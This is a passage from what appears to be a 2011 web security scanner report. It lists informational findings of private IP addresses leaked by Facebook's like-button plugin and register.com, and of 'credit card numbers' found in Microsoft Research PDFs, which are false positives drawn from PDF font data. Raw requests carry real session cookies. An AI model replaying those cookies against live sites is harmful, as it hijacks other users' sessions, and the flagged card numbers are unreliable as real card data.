Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

22.244. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.251.38

Request

GET /plugins/like.php?href=http%3A%2F%2Ffrankgruber.me%2Fpost%2F9680693152%2Fthe-view-looking-out-from-techcocktail-boston-at&layout=button_count&show_faces=false&width=110&action=like&font=lucida+grande&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

22.245. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.19.59

Request

GET /plugins/like.php?href=http://microsoftcambridge.com/Events/MassachusettsTheFutureofMarketingisHere/tabid/875/Default.aspx&layout=button_count&show_faces=false&width=80&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/MassachusettsTheFutureofMarketingisHere/tabid/875/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

22.246. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.223.52

Request

GET /plugins/like.php?href=http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx&layout=button_count&show_faces=false&width=80&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

22.247. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.129.31

Request

GET /plugins/like.php?href=http://microsoftcambridge.com/Events/RootCausesSocialInnovationForumSeptember2011/tabid/821/Default.aspx&layout=button_count&show_faces=false&width=80&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

22.248. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.189.47

Request

GET /plugins/like.php?href=http://www.godaddy.com/ssl/ssl-certificates.aspx?isc=smfbfos&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

22.249. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.223.39

Request

Response

22.250. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.229.63

Request

Response

22.251. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.226.50

Request

GET /plugins/like.php?href=http://microsoftcambridge.com/Working/Jobs/tabid/145/Default.aspx&layout=button_count&show_faces=false&width=80&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Working/Jobs/tabid/145/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

22.252. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.42.36

Request

Response

22.253. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.53.64

Request

GET /plugins/like.php?href=http://microsoftcambridge.com/Events/BostonAreaSharePointUsersGroupSeptember2011/tabid/717/Default.aspx&layout=button_count&show_faces=false&width=80&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/BostonAreaSharePointUsersGroupSeptember2011/tabid/717/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

22.254. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.37.64

Request

GET /plugins/like.php?href=http://microsoftcambridge.com/Events/TapintoGenY/tabid/876/Default.aspx&layout=button_count&show_faces=false&width=80&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/TapintoGenY/tabid/876/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

22.255. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.216.57

Request

GET /plugins/like.php?href=http://microsoftcambridge.com/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx&layout=button_count&show_faces=false&width=80&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

22.256. http://www.register.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.22.17.21

Request

Response

22.257. http://www.register.com/domain/searchresults.rcmx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/domain/searchresults.rcmx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.22.17.21

Request

GET /domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

22.258. http://www.register.com/unauthenticated_session_expired.rcmx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/unauthenticated_session_expired.rcmx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.22.17.23

Request

Response

22.259. http://www.register.com/unauthenticated_session_expired.rcmx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/unauthenticated_session_expired.rcmx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.22.17.21

Request

Response

23. Credit card numbers disclosed previous next
There are 18 instances of this issue:

http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/bek_tr.pdf
http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/dagstuhl-summary-09141.pdf
http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/hotsec06.pdf
http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/pepm08.pdf
http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/transducers_tr.pdf
http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/usenixsec11a.pdf
http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/w2sp07.pdf
http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/w2sp10.pdf
http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pdf
http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/usenixtech08.pdf
http://research.microsoft.com/en-us/um/people/livshits/papers/tr/scriptgard_tr.pdf
http://research.microsoft.com/en-us/um/people/nswamy/papers/beep-www07.pdf
http://research.microsoft.com/en-us/um/people/nswamy/papers/rs.pdf
http://research.microsoft.com/en-us/um/people/shuochen/papers/ScriptAccenting.pdf
http://research.microsoft.com/en-us/um/people/xiaohe/publication/IEEE_MMSP06_p226.pdf
http://research.microsoft.com/en-us/um/people/zhang/
http://research.microsoft.com/en-us/um/redmond/events/aplwaca2010/s0pknu7ytck3k3lq9nas/p45-krithinakis.pdf
http://www.meetup.com/Boston-BizSpark-Meetup/

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

23.1. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/bek_tr.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/pdf/bek_tr.pdf

Issue detail

The following credit card number was disclosed in the response:

4443332780000000

Request

GET /en-us/um/people/livshits/papers/pdf/bek_tr.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Fri, 26 Nov 2010 22:26:14 GMT
Accept-Ranges: bytes
ETag: "3eafb3efb88dcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:17 GMT
Connection: close
Content-Length: 6425544

%PDF-1.4
%....
3 0 obj <<
/Length 5469
/Filter /FlateDecode
>>
stream
x..[[....~....U..bp.u.l...I&.d:.=...E...P...g:.~...TSs:~.....@.....{..w..}....&.{|...D..e..l..=..~.}w...?p.8.qj....$.S....>5
...[SNIP]...
6 556 389 278 389 422 500 333 500 500 444 500 444 278 500 500 278 278 444 278 722 500 500 500 500 389 389 278 500 444 667 444 444 389]
endobj
171 0 obj
[556 556 167 333 667 278 333 333 0 333 570 0 667 444 333 278 0 0 0 0 0 0 0 0 0 0 0 0 333 278 250 333 555 500 500 1000 833 333 333 333 500 570 250 333 250 278 500 500 500 500 500 500 500 500 500 500 333 333 570 570 570 500 930 722 667 722 722 667 611 778 778 389 500 778 667 9
...[SNIP]...

23.2. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/dagstuhl-summary-09141.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/pdf/dagstuhl-summary-09141.pdf

Issue detail

The following credit card number was disclosed in the response:

5133445626253120

Request

GET /en-us/um/people/livshits/papers/pdf/dagstuhl-summary-09141.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Tue, 24 Aug 2010 02:48:39 GMT
Accept-Ranges: bytes
ETag: "91c321db3643cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:20 GMT
Connection: close
Content-Length: 162072

%PDF-1.7%....
130 0 obj<</Linearized 1/L 162072/O 136/E 97451/N 11/T 159424/H [ 1576 459]>>endobj
xref
130 64
0000000016 00000 n
0000002035 00000 n
0000002245 00000 n
0000002289
...[SNIP]...
o/p/r/s/t/u/v/w/x/y/endash)>>endobj156 0 obj[312 0 562 562 562 562 562 562 0 0 0 562 0 0 0 0 0 0 0 850 0 812 862 738 0 0 0 419 0 0 0 0 0 845 0 0 839 625 0 0 0 1162 0 0 0 0 0 0 0 0 0 547 625 500 625 513 344 562 625 312 0 0 312 937 625 562 625 0 459 444 437 625 594 812 594 594 0 562]endobj157 0 obj<</Differences[0/.notdef 46/period 47/.notdef 48/zero/one/two/three/four/five 54/.notdef 57/nine 58/.notdef 65/A 66/.not
...[SNIP]...

23.3. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/hotsec06.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/pdf/hotsec06.pdf

Issue detail

The following credit card numbers were disclosed in the response:

5250525525525525
5315310053105310

Request

GET /en-us/um/people/livshits/papers/pdf/hotsec06.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Mon, 10 Apr 2006 21:44:08 GMT
Accept-Ranges: bytes
ETag: "0c43fe5e75cc61:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:21 GMT
Connection: close
Content-Length: 171998

%PDF-1.4
4 0 obj <<
/Length 4112
/Filter /FlateDecode
>>
stream
x..ZI.......`......htc.).T..e'q4....M.C.. ......... ..]%z_.........oT.PY..d...Pq..y.H."LM.x................[.tf.w.r..{X...;i.w[>.
...[SNIP]...
/five/seven/eight/nine/colon/equal/question/C/D/E/G/H/I/K/P/S/W/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/u/v/w/x/y/z)
/FontFile 27 0 R
>> endobj
104 0 obj
[531 531 531 531 531 531 531 531 531 0 531 531 531 531 0 0 531 0 531 0 0 0 531 531 531 0 531 531 531 0 531 0 0 0 0 531 0 0 531 0 0 0 531 0 0 0 0 0 0 0 0 0 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 531 ]
endobj
103
...[SNIP]...
ntFile 15 0 R
>> endobj
112 0 obj
[525 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 525 0 0 0 525 0 525 0 0 0 0 0 0 0 0 0 0 525 525 0 0 0 0 0 0 0 0 0 0 0 525 0 525 525 525 525 0 525 525 0 0 525 525 525 525 525 0 525 525 525 525 525 0 0 525 ]
endobj
111 0 obj <<
/Type /Encoding
/Differences [ 0 /.notdef 46/period 47/.notdef 67/C 68/.notdef 71/G 72/.notdef 73/I 74/.notdef 84/T/U 86/.notdef 97/a 98/.notdef 99/c/d/e/f 103/.notde
...[SNIP]...

23.4. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/pepm08.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/pdf/pepm08.pdf

Issue detail

The following credit card number was disclosed in the response:

5140000000000000

Request

GET /en-us/um/people/livshits/papers/pdf/pepm08.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Sun, 16 Dec 2007 00:41:29 GMT
Accept-Ranges: bytes
ETag: "8026a657c3fc81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:20 GMT
Connection: close
Content-Length: 138086

%PDF-1.4
3 0 obj <<
/Length 4727
/Filter /FlateDecode
>>
stream
x........}.b^R.T.P......."%.w..j.......1.......8..R. @.q5.}....W?.......w.O;7.l'Jv...Q....G.^gcW6.......>
-}.....Z.KUfj(..g.s9..O.
...[SNIP]...
94
/FontName /PZWVEE+CMSY9
/ItalicAngle -14
/StemV 87
/XHeight 431
/FontBBox [-30 -958 1146 777]
/Flags 4
/CharSet (/asteriskmath/similar/braceleft/braceright/bar)
/FontFile 9 0 R
>> endobj
108 0 obj
[514 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 799 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 514 514 0 0 286 ]
endobj
7 0
...[SNIP]...

23.5. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/transducers_tr.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/pdf/transducers_tr.pdf

Issue detail

The following credit card numbers were disclosed in the response:

4780005940000000
5255250525525525
5255255250525525
5255255255255250

Request

GET /en-us/um/people/livshits/papers/pdf/transducers_tr.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Tue, 15 Mar 2011 20:28:32 GMT
Accept-Ranges: bytes
ETag: "bd417d8d4fe3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:21 GMT
Connection: close
Content-Length: 261714

%PDF-1.4
%....
5 0 obj
<</Length 6 0 R/Filter /FlateDecode>>
stream
x..]Y.].q~g.#..4..=>X....%.+).I$:......E.9#.......k7....p....Wg.p.F/_/..b].....go........G..............go.~...
.j[v............6{
...[SNIP]...
</BaseFont/DVKFFR+CMTT9/FontDescriptor 13 0 R/Type/Font
/FirstChar 34/LastChar 125/Widths[ 525 525 525 0 525 525 525 525 525 525 525 525 525 525
525 525 525 525 525 0 0 0 525 525 525 525 525 525 525 525
525 525 525 0 0 525 0 0 525 0 0 0 525 0 0 0
0 0 0 525 525 0 0 0 525 0 525 525 525 525 525 525
525 525 525 525 525 525 525 525 525 525 0 0 525 525 525 525
525 525 525 525 525 525 525 525 0 525 525 525 525 525]
/Encoding 152 0 R/Subtype/Type1>
...[SNIP]...
Char 15/LastChar 113/Widths[ 476
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 339 0 585 0 0
0 859 863 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
478 0 0 0 594 0 0 0 0 0 0 0 0 0 0 0
588 523]
/Encoding 165 0 R/Subtype/Type1>
...[SNIP]...

23.6. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/usenixsec11a.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/pdf/usenixsec11a.pdf

Issue detail

The following credit card numbers were disclosed in the response:

5250525525525525
5255255250525525
5255255255255250

Request

GET /en-us/um/people/livshits/papers/pdf/usenixsec11a.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Thu, 09 Jun 2011 23:12:49 GMT
Accept-Ranges: bytes
ETag: "b2b96dc0fa26cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:17 GMT
Connection: close
Content-Length: 536406

%PDF-1.4
%....
5 0 obj
<</Length 6 0 R/Filter /FlateDecode>>
stream
x..][........+.j.vf..n.........c+.T%~.4#..,..d[...?x..I.$x.....TE.=.l6......l].............g.~........_.......c..>..6<..).........~.
...[SNIP]...
</BaseFont/LDBBLM+CMTT10/FontDescriptor 14 0 R/Type/Font
/FirstChar 46/LastChar 122/Widths[ 525 0
525 525 525 525 525 0 0 525 0 525 0 0 0 0 0 0
0 525 0 0 0 525 525 525 525 525 525 0 525 525 525 525
525 0 0 525 525 0 0 525 525 0 525 0 0 0 0 0
0 525 525 525 525 525 0 525 525 525 0 525 525 525 525 525
525 0 525 525 525 525 525 525 0 525 525]
/Encoding/WinAnsiEncoding/Subtype/Type1>
...[SNIP]...
0 525 525
525 0 0 525 0 0 525 525 0 525 525 525 525 525 0 0
0 525 525 525 0 0 0 0 0 0 525 0 0 0 0 0
0 0 0 525 0 0 0 0 0 0 0 525 0 525 0 0
0 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525
525 0 525 525 525 525 525 525 0 525 0 525 525 525]
/Encoding 211 0 R/Subtype/Type1>
...[SNIP]...

23.7. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/w2sp07.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/pdf/w2sp07.pdf

Issue detail

The following credit card number was disclosed in the response:

4932501239750

Request

GET /en-us/um/people/livshits/papers/pdf/w2sp07.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Thu, 26 Apr 2007 00:55:03 GMT
Accept-Ranges: bytes
ETag: "5a77ef859d87c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:18 GMT
Connection: close
Content-Length: 267982

%PDF-1.4
4 0 obj <<
/Length 4056
/Filter /FlateDecode
>>
stream
x......6.._....T". ..k..I...xs.[[[.. ..h.Px.......q6....h...F_..o.=...6*.C.o..7y.'Y.I#.g9@.....,...0.>...3}9.n.8.^.b....G;i...a..
...[SNIP]...
pe /FontDescriptor
/FontName /ABCDEE#2BCALIBRI#2CBold
/Flags 32
/ItalicAngle 0
/Ascent 750
/Descent -250
/CapHeight 750
/AvgWidth 518
/MaxWidth 1732
/FontWeight 700
/XHeight 250
/StemV 51
/FontBBox [ -493 -250 1239 750]
/FontFile2 39 0 R
>
...[SNIP]...

23.8. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/w2sp10.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/pdf/w2sp10.pdf

Issue detail

The following credit card number was disclosed in the response:

4443332780000000

Request

GET /en-us/um/people/livshits/papers/pdf/w2sp10.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Fri, 30 Apr 2010 22:57:49 GMT
Accept-Ranges: bytes
ETag: "838b598eb8e8ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:19 GMT
Connection: close
Content-Length: 287212

%PDF-1.4
%....
3 0 obj <<
/Length 3338
/Filter /FlateDecode
>>
stream
x....r...._..T......3~.]...^o..J....!1..x..*..O..9#.v^4@..4...^....qq#.P.$..?....I*oR..*In.....7M..d.<......L.........3.<..
...[SNIP]...
